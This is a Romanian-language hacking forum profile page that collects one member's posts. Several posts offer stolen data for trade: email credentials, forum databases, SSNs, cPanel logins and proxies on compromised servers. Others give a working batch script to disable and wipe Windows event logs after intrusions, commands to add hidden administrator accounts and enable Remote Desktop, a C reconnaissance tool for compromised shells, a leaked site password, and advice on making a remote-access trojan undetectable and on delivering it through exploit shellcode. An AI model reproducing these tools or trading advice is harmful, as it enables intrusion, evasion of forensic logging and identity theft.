Jump to content

escalation666

Active Members
  • Posts

    567
  • Joined

  • Last visited

  • Days Won

    3

Everything posted by escalation666

  1. Chestiile cu care pot face trade/sell: -shellz -proxy's instalate de mine pe servere, unele sunt php-proxy si suporta doar protocolul http, dar am si altele mai bune care suporta mai multe protocoluri cum ar fi ftp, telnet, pop3, smtp, socks, mms, rtsp. Proxy pentru SSL NU am pentru moment... -baze de date de pe diferite forumuri. -usere/parole de yahoo, gmail, hotmail, msn, comcast, aol, bellsouth etc. Trebuie sa prezizez ca ele contin si multe date privitoare la chestiile alea interzise pe care nu le pot numi aici dar care incep cu e...p... -SSN (Social Security Numbers) am auzit ca se cauta si de astea :roll: -Cpanel's login. In principiu cer e-gold pe astea dar daca aveti ceva interesant de oferit, putem face trade.
  2. Un mic script facut de mine @echo off @echo *********************************************************************** @echo * * @echo * Event Log cleaner * @echo * by escalation666 * @echo *********************************************************************** echo Windows Registry Editor Version 5.00> temp.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog]>> temp.reg echo "Start"=dword:00000004>> temp.reg REGEDIT /S temp.reg DEL /Q temp.reg shutdown -r Dupa ce ati executat scriptul, si dupa ce s-a restartat calc, puteti sterge log-urile din Event Viewer. Manual: del C:\windows\system32\config\*.evt sau puteti face inca un script batch cu urmatoarea linie de cod: del %SystemRoot%\system32\config\*.evt echo Windows Registry Editor Version 5.00> temp.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog]>> temp.reg echo "Start"=dword:00000002>> temp.reg REGEDIT /S temp.reg DEL /Q temp.reg Log-urile is sterse, event viewer nu mai este disabled, and you are safe! Este posibil ca unele servicii care sunt dependente de Event Logs sa nu mai functioneze, dar din cate am testat eu nu sunt astfel de probleme. De ce e nevoie sa stergem log-urile din event viewer? Pai simplu...daca te conectezi prin vnc la server, ti se logheaza ip-ul and you are fucked
  3. Daca vrei niste proxy-uri elite (care suporta porturile 21,23, http,pop3,smtp,socks,mms,rstp) , instalate de mine pe servere, you can pm me for some trade. Din pacate nu suporta ssl, dar sper sa remediez asta. Nu poti sti niciodata daca proxy-urile publice sunt sniffuite, honneypots sau iti logheaza activitatea.
  4. Te asigur eu ca este folositor, e testat in the wild ...daca poti executa comenzi pe server, iti trebuie cateva secunde sa tastezi net user user_tau parola /add si net localgroup administrators user_tau /add, executi batch-ul si te-ai ales cu un Remote Desktop.
  5. @echo off @echo *********************************************************************** @echo * * @echo * Enable Remote Desktop From Dos * @echo * * @echo * * @echo * * @echo * * @echo * * @echo * Terminal Server Is Enable Now...... * @echo * * @echo * * @echo * THIS BAT FILE MADE BY: BOGYMAN AND ALL THE RIGHTS RESERVED TO HIM. * @echo * * @echo *********************************************************************** echo Windows Registry Editor Version 5.00> hide.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> hide.reg echo "fDenyTSConnections"=dword:00000000>> hide.reg REGEDIT /S hide.reg DEL /Q hide.reg echo Windows Registry Editor Version 5.00> hide.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> hide.reg echo "AllowTSConnections"=dword:00000001>> hide.reg REGEDIT /S hide.reg DEL /Q hide.reg echo Windows Registry Editor Version 5.00> hide.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> hide.reg echo "fAllowToGetHelp"=dword:00000001>> hide.reg REGEDIT /S hide.reg DEL /Q hide.reg
  6. O serie de programele si un script destinate windows-ului care colecteaza intr-un fisier log informatii despre server, cum ar fi uptime-ul, latimea de banda etc... Nu pot garanta ca nu sunt backdoored sau ca nu contin troieni, pentru ca le-am gasit pe un server compromis. Download: http://rapidshare.com/files/39306234/systeminfo.rar.html Si un simplu program in C facut de mine, care face aceleasi chestii in Linux. E folositor cand ai un shell si nu mai trebuie sa dai toate acele comenzi pentru a afla diverse informatii despre server #include <stdio.h> void main() { printf("Efectuez comanda uname.\n\n"); system("uname -a >> sysinfo.log"); printf("Efectuez comanda id..\n\n"); system("id >> sysinfo.log"); printf("Aflu continutul /etc/HOSTNAME...\n\n"); system("cat /etc/HOSTNAME >> sysinfo.log"); printf("Aflu configuratia procesorului....\n\n"); system("cat /proc/cpuinfo >> sysinfo.log"); printf("Efectuez comanda /proc/version.....\n\n"); system("cat /proc/version >> sysinfo.log"); printf("Aflu cat RAM este pe server......\n\n"); system("grep MemTotal /proc/meminfo >> sysinfo.log"); printf("Aflu ce procese active se desfasoara.......\n\n"); system("ps aux >> sysinfo.log"); printf("Spatiu disponibil pe hard........\n\n"); system("df -h >> sysinfo.log"); printf("Efectuez comanda ifconfig.........\n\n"); system("ifconfig >> sysinfo.log"); printf("Aflu cine se mai afla pe server..........\n\n"); system("who >> sysinfo.log"); printf("Aflu uptime-ul serverului...........\n\n"); system("uptime >> sysinfo.log"); printf("Conexiuni active in acest moment............\n\n"); system("netstat -tupl | grep LISTEN >> sysinfo.log"); printf("Downloaderi existenti.............\n\n"); system("which wget curl lynx links >> sysinfo.log"); printf("Aflu conexiuni arp..............\n\n"); system("arp -a >> sysinfo.log"); }
  7. Oamenii astia simpli au mai mult talent si muncesc mai mult decat orice artista prostituata siliconata de la noi. Ma refer la asa zisele "cantarete" care n-au nimic de zis decat cateva rime care se termina in genul "mine-tine", interpretate cu voce orgasmica. Astea-s numai 2 exemple dar sunt mult mai multe...And they ROCK! http://www.youtube.com/watch?v=_QIpic5HuXo&mode=related&search=
  8. Dupa niste cercetare am aflat ca este doar un digital satellite receiver. :oops: Oricum the fun goes on, pentru ca am gasit mai multe astfel de sisteme! Ma gandesc ca cei care ofera servicii de televiziune prin cablu se conecteaza tot remote la software-ul care gestioneaza frecventele posturilor tv, si alte facilitati, poate chiar printr-o interfata web... Nu sunt un fan al televizorului, dar vreau sa aflu mai multe despre cum poate fi exploatata aceasta tehnologie numita televiziune ....asa ca the search goes on.
  9. Heh....just for fun!
  10. Primul comp: CPU: Intel Celeron 2,4 Ghz RAM: 512 HDD: 80 Gb MB: ASUS P4R800-V Sisteme de operare: Backtrack | Windows 2003 si WinXP in Vmware parca Second: CPU: Intel 1 Ghz RAM:256 HDD: 20 Gb MB: nu e cine stie ce Sistem de operare: WinXP Si cel mai nou: CPU: AMD Sempron 3400+ RAM: 1 Gb MB: ASUS K8V-X-SE HDD: 320 GB Sistem de operare: BackTrack iar in Vmware am Windows 2003 SP1, Win 2003 SP 2, WinXP, Fedora Core 4 pe care mai testez diferite chestii
  11. Dupa cum ii spune si denumirea , puteti face cam tot ce doriti cu aceasta masina incepand de la DoS, scanat si bruteforce etc... Este un mediu destul de safe si legal pentru a va manifesta cele mai intunecate blackhat skills Cititi mai jos pentru mai multe detalii http://p6drad-teel.net/~windo/slut-box/details.html De asemenea, m-am gandit si eu sa realizez ceva de genul, mai ales ca dispun de calculatoare in plus. Daca este cineva interesat de asa ceva...poate posta aici. Windows or Linux?
  12. intr-adevar este simplu....este un fisier prin care administratorii se pot apara de google hacking (hint:directoare si alte chestii )
  13. Site URL: http://www.kimksuperstar.com User name: cruzer Password: damonjj Pozele si niste video's cu Kimberly Noel Kardashian si William Ray Norwood Jr. Well....cine is astia? Kimberly (http://en.wikipedia.org/wiki/Kim_Kardashian) nu se remarca prin nimic deosebit in afara faptului ca este o prietena de-a puscariasei Paris Hilton, iar Ray J (http://en.wikipedia.org/wiki/Ray_J) este un cantaret R&B si actor. Cei doi au intrat in atentia mass-mediei dupa ce materiale cu continut sexual au ajuns unde nu trebuie Vivid Entertainment a dat 1 mil de $ pe sursa....dar fiind data in judecata de Kimberly, va trebui sa plateasca 5 mil $ despagubiri. Enjoy
  14. nice shit....trebuie sa fii pregatit pentru orice oricand
  15. bine ai venit
  16. Mirkov4, a remote administration tool over http. It currently features desktop interaction (ala VNC), naviguation through the computer drives, download/upload/removal of files, execution of commands and a display of current running processes. Download: http://www.hacker-soft.net/down.php?id=2437&url=1 Avand si sursa poti sa-l modifici foarte usor si sa-l faci nedetectabil. Testat cu succes pe win2003 si nod32. Te conectezi la victima folosind browserul: http://ip_vitima:7887 dar daca modifici sursa poti pune ce port vrei. Singurul neajuns e dat de faptul ca fiind comunicatie http necriptata, poate fi sniffuita si un admin de retea ar putea vedea toata magaria Cred ca ssh dynamic port forwarding va ajuta in privinta asta :wink:
  17. Un program care ar trebui sa fie la indemana oricarui pokemon interesat de fizica Cool Computer Program:
  18. Dupa cum spune titlul....un tutorial despre cum sa supravietuiesti unui atac al hoardelor de zombie's.... funny shit http://www.kuro5hin.org/story/2005/4/18/153047/155
  19. nos e baiatzelul care nu va creste niciodata...peter pan io am 11 ani...iar peste 2 luni fac 9 8)
  20. nice...u owned the bitch
  21. se inchide procesul troianului o data cu inchiderea browserul...dar metoda cu folosirea unui webdownloader a fost o idee buna...uitasem de ea
  22. Am testat ideea (btw very good idea) cu 2 web downloaders diferiti...si am ajuns la acelasi rezultat...Daca dai in executie minunea care a downloadat-o webdownloader-ul...se deschide intai browserul (IE in cazul meu) si apoi se executa si troianul... @bossjuan: pai inlocuiesti shellcod-ul care executa calc.exe cu shellcod-ul tau...ai aici tot ce iti trebuie http://metasploit.com:55555/PAYLOADS...sau poti sa folosesti si sa compilezi unul din exploiturile de pe milw0rm: asta de exemplu http://milw0rm.com/exploits/4053
  23. Sincer sa fiu, aveam asteptari mai mari de la acest exploit, dar dupa ce l-am testat cu succes pe un win2003 care rula in vmware, am observat ca programul (in testele mele a fost un server de bifrost) pe care il va downloada si executa victima nu avea un proces independent ci va rula in contextul procesului browserului care deschidea pagina malitioasa.....deci in momentul in care inchideai browserul se inchidea si procesul troianului. In plus, cei de la Yahoo au reactionat f prompt lansand un patch...asa ca e cam greu sa gasesti victime...so the exploit it's pretty useless.. Cine are o idee, parere, sugestie, sfat etc despre cum poate fi depasita aceasta problema este binevenit sa o expuna
  24. nu functioneaza...testat pe o masina virtuala
  25. lol pwned a drecu' comanda cd...
×
×
  • Create New...